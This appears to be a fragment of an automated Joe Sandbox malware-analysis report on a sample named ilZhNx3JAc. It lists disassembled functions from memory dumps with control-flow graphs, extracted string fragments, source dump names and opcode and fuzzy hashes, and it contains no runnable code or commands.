                                                                                                              control_flow_graph 1057 8a93b40-8a93b50 1058 8a93c69-8a93c8e 1057->1058 1059 8a93b56-8a93b5a 1057->1059 1061 8a93c95-8a93cba 1058->1061 1060 8a93b60-8a93b69 1059->1060 1059->1061 1062 8a93b6f-8a93b96 1060->1062 1063 8a93cc1-8a93cf7 1060->1063 1061->1063 1074 8a93b9c-8a93b9e 1062->1074 1075 8a93c5e-8a93c68 1062->1075 1080 8a93cfe-8a93d08 1063->1080 1076 8a93bbf-8a93bc1 1074->1076 1077 8a93ba0-8a93ba3 1074->1077 1081 8a93bc4-8a93bc8 1076->1081 1079 8a93ba9-8a93bb3 1077->1079 1077->1080 1079->1080 1082 8a93bb9-8a93bbd 1079->1082 1088 8a93d0a-8a93d54 1080->1088 1089 8a93d5f-8a93d6a 1080->1089 1083 8a93c29-8a93c35 1081->1083 1084 8a93bca-8a93bd9 1081->1084 1082->1076 1082->1081 1083->1080 1087 8a93c3b-8a93c58 1083->1087 1084->1080 1092 8a93bdf-8a93c26 1084->1092 1087->1074 1087->1075 1100 8a93d78-8a93d8f 1088->1100 1101 8a93d56-8a93d5b 1088->1101 1155 8a93d6d call 8a94258 1089->1155 1156 8a93d6d call 8a940c1 1089->1156 1157 8a93d6d call 8a940d0 1089->1157 1092->1083 1094 8a93d73 1096 8a93fa3-8a93fae 1094->1096 1103 8a93fdd-8a93ffe 1096->1103 1104 8a93fb0-8a93fc0 1096->1104 1113 8a93e80-8a93e90 1100->1113 1114 8a93d95-8a93e7b call 8a92778 call 8a91910 1100->1114 1101->1089 1110 8a93fd0-8a93fd6 1104->1110 1111 8a93fc2-8a93fc8 1104->1111 1110->1103 1111->1110 1118 8a93f7e-8a93f9a 1113->1118 1119 8a93e96-8a93f70 1113->1119 1114->1113 1118->1096 1152 8a93f7b 1119->1152 1153 8a93f72 1119->1153 1152->1118 1153->1152 1155->1094 1156->1094 1157->1094
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405755734.0000000008A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8a90000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (q$(q$Hq
                                                                                                              • API String ID: 0-2914423630
                                                                                                              • Opcode ID: f46a32ee89d07fa1587eb623a13edd2d1b4766dec674923a2ebc099b3629fc60
                                                                                                              • Instruction ID: 694508001dc240d4f53cf2e90dd28b3fb831a5b57d851cc0f2355fcb0272ea3a
                                                                                                              • Opcode Fuzzy Hash: f46a32ee89d07fa1587eb623a13edd2d1b4766dec674923a2ebc099b3629fc60
                                                                                                              • Instruction Fuzzy Hash: B2E12D34A00608DFDF04EF64D594A9EBBB6FF88301F108569E846AB765DB34EC46CB91
                                                                                                              Function 06EF14B0 Relevance: 4.0, Strings: 3, Instructions: 262COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1158 6ef14b0-6ef14d2 1159 6ef14d8-6ef14dd 1158->1159 1160 6ef1661-6ef16b6 1158->1160 1161 6ef14df-6ef14e5 1159->1161 1162 6ef14f5-6ef1501 1159->1162 1169 6ef16ce-6ef16d2 1160->1169 1170 6ef16b8-6ef16be 1160->1170 1163 6ef14e9-6ef14f3 1161->1163 1164 6ef14e7 1161->1164 1171 6ef160c-6ef1616 1162->1171 1172 6ef1507-6ef150a 1162->1172 1163->1162 1164->1162 1177 6ef17a9-6ef17b3 1169->1177 1178 6ef16d8-6ef16da 1169->1178 1175 6ef16c2-6ef16cc 1170->1175 1176 6ef16c0 1170->1176 1173 6ef1618-6ef1621 1171->1173 1174 6ef1624-6ef162a 1171->1174 1172->1171 1179 6ef1510-6ef1517 1172->1179 1182 6ef162c-6ef162e 1174->1182 1183 6ef1630-6ef163c 1174->1183 1175->1169 1176->1169 1180 6ef17b5-6ef17be 1177->1180 1181 6ef17c1-6ef17c7 1177->1181 1178->1177 1184 6ef16e0-6ef16e4 1178->1184 1179->1160 1185 6ef151d-6ef1522 1179->1185 1186 6ef17cd-6ef17d9 1181->1186 1187 6ef17c9-6ef17cb 1181->1187 1189 6ef163e-6ef165e 1182->1189 1183->1189 1190 6ef16e6-6ef1702 1184->1190 1191 6ef1704 1184->1191 1192 6ef153a-6ef153e 1185->1192 1193 6ef1524-6ef152a 1185->1193 1194 6ef17db-6ef17f9 1186->1194 1187->1194 1195 6ef1706-6ef1708 1190->1195 1191->1195 1192->1171 1196 6ef1544-6ef1548 1192->1196 1198 6ef152e-6ef1538 1193->1198 1199 6ef152c 1193->1199 1195->1177 1200 6ef170e-6ef1717 1195->1200 1201 6ef154a-6ef1566 1196->1201 1202 6ef1568 1196->1202 1198->1192 1199->1192 1200->1177 1214 6ef171d-6ef1720 1200->1214 1208 6ef156a-6ef156c 1201->1208 1202->1208 1208->1171 1213 6ef1572-6ef1576 1208->1213 1216 6ef1599 1213->1216 1217 6ef1578-6ef1581 1213->1217 1222 6ef172a-6ef1730 1214->1222 1218 6ef159c-6ef15a8 1216->1218 1220 6ef1588-6ef1595 1217->1220 1221 6ef1583-6ef1586 1217->1221 1226 6ef15af-6ef15fd 1218->1226 1227 6ef15aa-6ef15ad 1218->1227 1223 6ef1597 1220->1223 1221->1223 1228 6ef1735-6ef1737 1222->1228 1223->1218 1229 6ef1602-6ef1609 1226->1229 1227->1229 1230 6ef174f-6ef17a6 1228->1230 1231 6ef1739-6ef173f 1228->1231 1233 6ef1743-6ef1745 1231->1233 1234 6ef1741 1231->1234 1233->1230 1234->1230
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1389862344.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_6ef0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4'q$4'q$l6o
                                                                                                              • API String ID: 0-1969874425
                                                                                                              • Opcode ID: 54fdfdadae1864c1236fee93f47e4b06458210f73bbbb349852b99e55784d280
                                                                                                              • Instruction ID: 06d53d6d9f4b1293972073f17bfa53ba2897b874bd507e5c0a23d760b031afd5
                                                                                                              • Opcode Fuzzy Hash: 54fdfdadae1864c1236fee93f47e4b06458210f73bbbb349852b99e55784d280
                                                                                                              • Instruction Fuzzy Hash: 0191F830F24308DFDB649B69D4507EABBE2AFC9315F18806AE50ACB291DB31DD41CB91
                                                                                                              Function 08A859F1 Relevance: 3.8, Strings: 3, Instructions: 63COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1528 8a859f1-8a859f8 1529 8a8584e-8a85864 1528->1529 1530 8a859fe-8a85a20 1528->1530 1560 8a85867 call 8aa6e38 1529->1560 1561 8a85867 call 8aa6e40 1529->1561 1531 8a84c6a-8a84c73 1530->1531 1532 8a85a26-8a85a31 1530->1532 1534 8a84c7c-8a8525a 1531->1534 1535 8a84c75 1531->1535 1532->1531 1533 8a85f44-8a85f67 1532->1533 1537 8a85f6d-8a85f78 1533->1537 1538 8a84b93-8a84b9c 1533->1538 1547 8a85b4b-8a85b7c 1534->1547 1548 8a85260-8a85282 1534->1548 1539 8a84bab-8a84bac 1535->1539 1540 8a84be0-8a84c03 1535->1540 1541 8a84c82-8a84cad 1535->1541 1536 8a85869-8a8589a 1536->1531 1542 8a858a0-8a858ab 1536->1542 1537->1538 1549 8a84b9e-8a84ba9 1538->1549 1550 8a84ba5-8a84ba6 1538->1550 1539->1533 1540->1538 1545 8a84c05-8a84c0e 1540->1545 1541->1531 1546 8a84caf-8a84cba 1541->1546 1542->1531 1542->1533 1545->1538 1546->1531 1546->1533 1558 8a85b7e 1547->1558 1559 8a85b83-8a85b97 1547->1559 1548->1531 1552 8a85288-8a85293 1548->1552 1551 8a84bc3-8a84bde 1549->1551 1550->1551 1551->1538 1552->1531 1558->1559 1559->1531 1559->1533 1560->1536 1561->1536
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405700497.0000000008A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8a80000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 1$D$I
                                                                                                              • API String ID: 0-4232602572
                                                                                                              • Opcode ID: 7d6d45c81103a0dc4efa1c4b7db332b20e97d1bc4f4014bb2552c38ccd972b96
                                                                                                              • Instruction ID: 9707fe9b33445829eb77b71b4cf002c292119734c5ea2e9f126850f713e7587d
                                                                                                              • Opcode Fuzzy Hash: 7d6d45c81103a0dc4efa1c4b7db332b20e97d1bc4f4014bb2552c38ccd972b96
                                                                                                              • Instruction Fuzzy Hash: 6731E5B490221ACFDB60CF18C888B99BBF5BB09305F5080EAD90DA7641DB755EC5CF18
                                                                                                              Function 06EF3F88 Relevance: 3.1, Strings: 2, Instructions: 577COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1389862344.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_6ef0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4'q$4'q
                                                                                                              • API String ID: 0-1467158625
                                                                                                              • Opcode ID: cdd05bf995acf4f457045f3a28bd75e63aea28e01b3b8929161142e8596ef684
                                                                                                              • Instruction ID: 73ca3dc00572348f04d08a6f05d8ed093bc8960a0c983eb32c04faf80a2c51cd
                                                                                                              • Opcode Fuzzy Hash: cdd05bf995acf4f457045f3a28bd75e63aea28e01b3b8929161142e8596ef684
                                                                                                              • Instruction Fuzzy Hash: 8142F534E20309CFEB94DF94D4486EEB7F2FB48305F50A429DA12AB296D7345986CF91
                                                                                                              Function 08B7EEC8 Relevance: 3.0, Strings: 2, Instructions: 516COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1897 8b7eec8-8b7eeee 1898 8b7eef0-8b7eefd 1897->1898 1899 8b7eeff-8b7ef08 1897->1899 1898->1899 1900 8b7ef0b-8b7ef18 1898->1900 1901 8b7ef23 1900->1901 1902 8b7ef1a-8b7ef21 1900->1902 1903 8b7ef2a-8b7ef54 1901->1903 1902->1903 1904 8b7ef56 1903->1904 1905 8b7ef5d-8b7ef70 call 8b7eba8 1903->1905 1904->1905 1908 8b7ef76-8b7ef89 1905->1908 1909 8b7f0b4-8b7f0bb 1905->1909 1919 8b7ef97-8b7efb1 1908->1919 1920 8b7ef8b-8b7ef92 1908->1920 1910 8b7f355-8b7f35c 1909->1910 1911 8b7f0c1-8b7f0d6 1909->1911 1912 8b7f35e-8b7f367 1910->1912 1913 8b7f3cb-8b7f3d2 1910->1913 1924 8b7f0f6-8b7f0fc 1911->1924 1925 8b7f0d8-8b7f0da 1911->1925 1912->1913 1917 8b7f369-8b7f37c 1912->1917 1915 8b7f46e-8b7f475 1913->1915 1916 8b7f3d8-8b7f3e1 1913->1916 1922 8b7f477-8b7f488 1915->1922 1923 8b7f491-8b7f497 1915->1923 1916->1915 1921 8b7f3e7-8b7f3fa 1916->1921 1917->1913 1939 8b7f37e-8b7f3c3 call 8b7c1a0 1917->1939 1935 8b7efb3-8b7efb6 1919->1935 1936 8b7efb8-8b7efc5 1919->1936 1926 8b7f0ad 1920->1926 1945 8b7f40d-8b7f411 1921->1945 1946 8b7f3fc-8b7f40b 1921->1946 1922->1923 1947 8b7f48a 1922->1947 1929 8b7f4a9-8b7f4b2 1923->1929 1930 8b7f499-8b7f49f 1923->1930 1932 8b7f1c4-8b7f1c8 1924->1932 1933 8b7f102-8b7f104 1924->1933 1925->1924 1931 8b7f0dc-8b7f0f3 1925->1931 1926->1909 1940 8b7f4b5-8b7f52a 1930->1940 1941 8b7f4a1-8b7f4a7 1930->1941 1931->1924 1932->1910 1942 8b7f1ce-8b7f1d0 1932->1942 1933->1932 1934 8b7f10a-8b7f137 1933->1934 1964 8b7f13e-8b7f18b call 8b7c1a0 * 3 1934->1964 1965 8b7f139 call 8b7c1a0 1934->1965 1944 8b7efc7-8b7efdb 1935->1944 1936->1944 1939->1913 1982 8b7f3c5-8b7f3c8 1939->1982 2020 8b7f52c-8b7f536 1940->2020 2021 8b7f538 1940->2021 1941->1929 1941->1940 1942->1910 1949 8b7f1d6-8b7f1df 1942->1949 1944->1926 1976 8b7efe1-8b7efea 1944->1976 1952 8b7f413-8b7f415 1945->1952 1953 8b7f431-8b7f433 1945->1953 1946->1945 1947->1923 1950 8b7f332-8b7f338 1949->1950 1956 8b7f34b 1950->1956 1957 8b7f33a-8b7f349 1950->1957 1952->1953 1961 8b7f417-8b7f42e 1952->1961 1953->1915 1962 8b7f435-8b7f43b 1953->1962 1963 8b7f34d-8b7f34f 1956->1963 1957->1963 1961->1953 1962->1915 1968 8b7f43d-8b7f46b 1962->1968 1963->1910 1969 8b7f1e4-8b7f1f2 call 8b7d970 1963->1969 2010 8b7f1a2-8b7f1c1 call 8b7c1a0 1964->2010 2011 8b7f18d-8b7f19f call 8b7c1a0 1964->2011 1965->1964 1968->1915 1987 8b7f1f4-8b7f1fa 1969->1987 1988 8b7f20a-8b7f224 1969->1988 2058 8b7efec call 8b7f6c0 1976->2058 2059 8b7efec call 8b7f6e8 1976->2059 1982->1913 1986 8b7eff2-8b7f027 2013 8b7f02d-8b7f035 1986->2013 1989 8b7f1fe-8b7f200 1987->1989 1990 8b7f1fc 1987->1990 1988->1950 1995 8b7f22a-8b7f22e 1988->1995 1989->1988 1990->1988 1999 8b7f230-8b7f239 1995->1999 2000 8b7f24f 1995->2000 2003 8b7f240-8b7f243 1999->2003 2004 8b7f23b-8b7f23e 1999->2004 2005 8b7f252-8b7f26c 2000->2005 2009 8b7f24d 2003->2009 2004->2009 2005->1950 2024 8b7f272-8b7f2f3 call 8b7c1a0 * 4 2005->2024 2009->2005 2010->1932 2011->2010 2018 8b7f037-8b7f039 2013->2018 2019 8b7f043-8b7f047 2013->2019 2018->2019 2019->1926 2025 8b7f049-8b7f061 2019->2025 2026 8b7f53d-8b7f53f 2020->2026 2021->2026 2052 8b7f2f5-8b7f307 call 8b7c1a0 2024->2052 2053 8b7f30a-8b7f330 call 8b7c1a0 2024->2053 2025->1926 2032 8b7f063-8b7f06f 2025->2032 2027 8b7f546-8b7f54b 2026->2027 2028 8b7f541-8b7f544 2026->2028 2031 8b7f551-8b7f57e 2027->2031 2028->2031 2035 8b7f071-8b7f074 2032->2035 2036 8b7f07e-8b7f084 2032->2036 2035->2036 2037 8b7f086-8b7f089 2036->2037 2038 8b7f08c-8b7f095 2036->2038 2037->2038 2040 8b7f097-8b7f09a 2038->2040 2041 8b7f0a4-8b7f0aa 2038->2041 2040->2041 2041->1926 2052->2053 2053->1910 2053->1950 2058->1986 2059->1986
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1406385202.0000000008B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8b70000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q$$q
                                                                                                              • API String ID: 0-3126353813
                                                                                                              • Opcode ID: 37234f8fd739974a541355e334cc469e52eee2229c2cc285a96b5c220a6e5f6c
                                                                                                              • Instruction ID: 72ce115c4f7793da2368394656cb9e24663a84f4623360c138ca1e850e6483f9
                                                                                                              • Opcode Fuzzy Hash: 37234f8fd739974a541355e334cc469e52eee2229c2cc285a96b5c220a6e5f6c
                                                                                                              • Instruction Fuzzy Hash: C7226B34E00219CFDB15CFA4D854ABEBBB2FF88701F148199E821AB395DB34A946CF55
                                                                                                              Function 06EF4AB0 Relevance: 2.9, Strings: 2, Instructions: 362COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 2175 6ef4ab0-6ef4ad8 2176 6ef4adf-6ef4b08 2175->2176 2177 6ef4ada 2175->2177 2178 6ef4b0a-6ef4b13 2176->2178 2179 6ef4b29 2176->2179 2177->2176 2181 6ef4b1a-6ef4b1d 2178->2181 2182 6ef4b15-6ef4b18 2178->2182 2180 6ef4b2c-6ef4b30 2179->2180 2183 6ef4ee7-6ef4efe 2180->2183 2184 6ef4b27 2181->2184 2182->2184 2186 6ef4b35-6ef4b39 2183->2186 2187 6ef4f04-6ef4f08 2183->2187 2184->2180 2188 6ef4b3e-6ef4b42 2186->2188 2189 6ef4b3b-6ef4b98 2186->2189 2190 6ef4f3d-6ef4f41 2187->2190 2191 6ef4f0a-6ef4f3a 2187->2191 2193 6ef4b6b-6ef4b8f 2188->2193 2194 6ef4b44-6ef4b68 2188->2194 2197 6ef4b9d-6ef4ba1 2189->2197 2198 6ef4b9a-6ef4c0b 2189->2198 2195 6ef4f43-6ef4f4c 2190->2195 2196 6ef4f62 2190->2196 2191->2190 2193->2183 2194->2193 2201 6ef4f4e-6ef4f51 2195->2201 2202 6ef4f53-6ef4f56 2195->2202 2200 6ef4f65-6ef4f6b 2196->2200 2204 6ef4bca-6ef4bdb 2197->2204 2205 6ef4ba3-6ef4bc7 2197->2205 2209 6ef4c0d-6ef4c6a 2198->2209 2210 6ef4c10-6ef4c14 2198->2210 2207 6ef4f60 2201->2207 2202->2207 2300 6ef4bde call 8a98880 2204->2300 2301 6ef4bde call 8a98870 2204->2301 2205->2204 2207->2200 2219 6ef4c6f-6ef4c73 2209->2219 2220 6ef4c6c-6ef4cc8 2209->2220 2214 6ef4c3d-6ef4c61 2210->2214 2215 6ef4c16-6ef4c3a 2210->2215 2214->2183 2215->2214 2223 6ef4c9c-6ef4cbf 2219->2223 2224 6ef4c75-6ef4c99 2219->2224 2232 6ef4ccd-6ef4cd1 2220->2232 2233 6ef4cca-6ef4d2c 2220->2233 2223->2183 2224->2223 2229 6ef4be4-6ef4bf1 2230 6ef4bf3-6ef4bf9 2229->2230 2231 6ef4c01-6ef4c02 2229->2231 2230->2231 2231->2183 2236 6ef4cfa-6ef4d12 2232->2236 2237 6ef4cd3-6ef4cf7 2232->2237 2242 6ef4d2e-6ef4d90 2233->2242 2243 6ef4d31-6ef4d35 2233->2243 2254 6ef4d14-6ef4d1a 2236->2254 2255 6ef4d22-6ef4d23 2236->2255 2237->2236 2252 6ef4d95-6ef4d99 2242->2252 2253 6ef4d92-6ef4df4 2242->2253 2246 6ef4d5e-6ef4d76 2243->2246 2247 6ef4d37-6ef4d5b 2243->2247 2265 6ef4d78-6ef4d7e 2246->2265 2266 6ef4d86-6ef4d87 2246->2266 2247->2246 2257 6ef4d9b-6ef4dbf 2252->2257 2258 6ef4dc2-6ef4dda 2252->2258 2263 6ef4df9-6ef4dfd 2253->2263 2264 6ef4df6-6ef4e58 2253->2264 2254->2255 2255->2183 2257->2258 2276 6ef4ddc-6ef4de2 2258->2276 2277 6ef4dea-6ef4deb 2258->2277 2268 6ef4dff-6ef4e23 2263->2268 2269 6ef4e26-6ef4e3e 2263->2269 2274 6ef4e5d-6ef4e61 2264->2274 2275 6ef4e5a-6ef4eb3 2264->2275 2265->2266 2266->2183 2268->2269 2287 6ef4e4e-6ef4e4f 2269->2287 2288 6ef4e40-6ef4e46 2269->2288 2279 6ef4e8a-6ef4ead 2274->2279 2280 6ef4e63-6ef4e87 2274->2280 2285 6ef4edc-6ef4edf 2275->2285 2286 6ef4eb5-6ef4ed9 2275->2286 2276->2277 2277->2183 2279->2183 2280->2279 2285->2183 2286->2285 2287->2183 2288->2287 2300->2229 2301->2229
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1389862344.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_6ef0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 4'q$4'q
                                                                                                              • API String ID: 0-1467158625
                                                                                                              • Opcode ID: ad9a9281b79ad01e779d57b840de3a9328a2e4e4bd90ada2db6953cc70df3c40
                                                                                                              • Instruction ID: b60c1a1fce6d114278636b1d0ea79df22d4a63bd6a0bf0975116e2b7111cccd3
                                                                                                              • Opcode Fuzzy Hash: ad9a9281b79ad01e779d57b840de3a9328a2e4e4bd90ada2db6953cc70df3c40
                                                                                                              • Instruction Fuzzy Hash: 99F1F434E11208DFEB54DFA4E4986EDBBB2FF89305F20652AE506AB391DB355885CF40
                                                                                                              Function 08B7ADA0 Relevance: 2.7, Strings: 2, Instructions: 200COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 2457 8b7ada0-8b7adaf 2458 8b7aed5-8b7aefa 2457->2458 2459 8b7adb5-8b7adc1 2457->2459 2463 8b7af01-8b7af9d 2458->2463 2462 8b7adc7-8b7adcf 2459->2462 2459->2463 2468 8b7adda-8b7adde 2462->2468 2490 8b7b000-8b7b004 2463->2490 2491 8b7af9f-8b7afa2 2463->2491 2470 8b7adf1-8b7ae08 2468->2470 2471 8b7ade0-8b7adef 2468->2471 2477 8b7ae12-8b7ae14 2470->2477 2478 8b7ae0a 2470->2478 2471->2470 2482 8b7ae1b-8b7ae28 2477->2482 2480 8b7ae16 2478->2480 2481 8b7ae0c-8b7ae10 2478->2481 2480->2482 2481->2477 2481->2480 2484 8b7ae30-8b7ae33 2482->2484 2485 8b7ae2a-8b7ae2e 2482->2485 2486 8b7ae36-8b7ae3e 2484->2486 2485->2486 2487 8b7ae57 2486->2487 2488 8b7ae40-8b7ae55 2486->2488 2492 8b7ae5b-8b7aeba 2487->2492 2488->2492 2494 8b7b006-8b7b00c 2490->2494 2495 8b7b014-8b7b02a 2490->2495 2496 8b7b02c 2491->2496 2497 8b7afa8-8b7afae 2491->2497 2504 8b7aece-8b7aed2 2492->2504 2505 8b7aebc-8b7aec6 2492->2505 2494->2496 2498 8b7b00e-8b7b010 2494->2498 2499 8b7b031-8b7b039 2495->2499 2496->2499 2500 8b7aff4-8b7affe 2497->2500 2501 8b7afb0-8b7afb3 2497->2501 2498->2495 2500->2490 2500->2491 2501->2500 2503 8b7afb5-8b7afb7 2501->2503 2506 8b7afc1-8b7afda 2503->2506 2507 8b7afb9-8b7afbf 2503->2507 2505->2504 2512 8b7afef-8b7aff1 2506->2512 2513 8b7afdc-8b7afe5 2506->2513 2507->2500 2507->2506 2512->2500 2513->2496 2514 8b7afe7-8b7afed 2513->2514 2514->2500
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1406385202.0000000008B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8b70000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (q$Hq
                                                                                                              • API String ID: 0-1154169777
                                                                                                              • Opcode ID: ecc2be65e9bc947d15f8f5df69619ee5d31191d1a8c2f133321bb4a1c7e4fa13
                                                                                                              • Instruction ID: 6f83ef6d391834bda636c4a42660264de5f6e10f999c068510994d83045c034f
                                                                                                              • Opcode Fuzzy Hash: ecc2be65e9bc947d15f8f5df69619ee5d31191d1a8c2f133321bb4a1c7e4fa13
                                                                                                              • Instruction Fuzzy Hash: 6D71BE30A007148FE728DF29C49075EBBE2EF84315F24966DD86A9B290DB35EC46CB95
                                                                                                              Function 08B7E0E0 Relevance: 2.7, Strings: 2, Instructions: 175COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1406385202.0000000008B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8b70000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (q$Hq
                                                                                                              • API String ID: 0-1154169777
                                                                                                              • Opcode ID: 272bcd090073ddc4ca58eb7dac0725a5e28ecdb923b43bbee4d5a4c14bea0586
                                                                                                              • Instruction ID: 466ab8372ed233208bdfccd432075bedfc7b6cf790d4d2fa3df1c1ea3edfe52b
                                                                                                              • Opcode Fuzzy Hash: 272bcd090073ddc4ca58eb7dac0725a5e28ecdb923b43bbee4d5a4c14bea0586
                                                                                                              • Instruction Fuzzy Hash: C651AE30B003008FEB19AF74D85466E77B2EFC5616B5445ACD95ADB3A0CE35EC42CBA9
                                                                                                              Function 08A95EA8 Relevance: 2.6, Strings: 2, Instructions: 146COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405755734.0000000008A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8a90000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (q$Hq
                                                                                                              • API String ID: 0-1154169777
                                                                                                              • Opcode ID: 45ef4553bb9406187fa540c35ba681e4a334508645eee4fb3503a232118219ed
                                                                                                              • Instruction ID: 22106102e342da206e87e33cb052cbf6f5e8a1fa30814864212a585894751ce9
                                                                                                              • Opcode Fuzzy Hash: 45ef4553bb9406187fa540c35ba681e4a334508645eee4fb3503a232118219ed
                                                                                                              • Instruction Fuzzy Hash: 31411230B087508FDB069B38C561B6E7FF2AFC6211B1580AED446CB7A2DA35DC02C7A5
                                                                                                              Function 08B7F6E8 Relevance: 2.6, Strings: 2, Instructions: 53COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1406385202.0000000008B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8b70000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q$$q
                                                                                                              • API String ID: 0-3126353813
                                                                                                              • Opcode ID: 3763d2267a26948483fe445ddd51aef36bb7fc40180af3641c740b6821215e9b
                                                                                                              • Instruction ID: 30448649fa81e4972995bab966a790aeb18fc2174bb12befbca4ce4d07bbd450
                                                                                                              • Opcode Fuzzy Hash: 3763d2267a26948483fe445ddd51aef36bb7fc40180af3641c740b6821215e9b
                                                                                                              • Instruction Fuzzy Hash: A3115B35600709DFEB24CE99E440BB9BBB5EF44356F1480AAE425D7350DB71E980C758
                                                                                                              Function 08A853B8 Relevance: 2.6, Strings: 2, Instructions: 52COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1405700497.0000000008A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_8a80000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ($7
                                                                                                              • API String ID: 0-2152368867
                                                                                                              • Opcode ID: 584bb83e4f9d9126364b1e4911ed2e2fc59bc4ece0d376029b00ca3c375011b0
                                                                                                              • Instruction ID: ccf60cf5b033741af67c46f7d02e72a96d29cc3f1ae5639ab940821b867d8ff4
                                                                                                              • Opcode Fuzzy Hash: 584bb83e4f9d9126364b1e4911ed2e2fc59bc4ece0d376029b00ca3c375011b0
                                                                                                              • Instruction Fuzzy Hash: 98219078906269CFDB60DF64C884B9EBBB1AB4A304F1080DAD819B7251DB316E86DF10
                                                                                                              Function 06EF0DA4 Relevance: 2.5, Strings: 2, Instructions: 44COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1389862344.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_6ef0000_ilZhNx3JAc.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: XXq$XXq
                                                                                                              • API String ID: 0-2437993854
                                                                                                              • Opcode ID: 352cb1762ee2287efb770970534c8c974e7b157e836cf66df36aef5e13e5f38e
                                                                                                              • Instruction ID: 9571cdb6e6b7b57e44d148a18d95768f5e200b101cab72aa0d5fb7c376057d32
                                                                                                              • Opcode Fuzzy Hash: 352cb1762ee2287efb770970534c8c974e7b157e836cf66df36aef5e13e5f38e
                                                                                                              • Instruction Fuzzy Hash: C001D431B102089FFF649B64E420BADFBA2EB89714B608125EA055F282CB31DD11CBE5
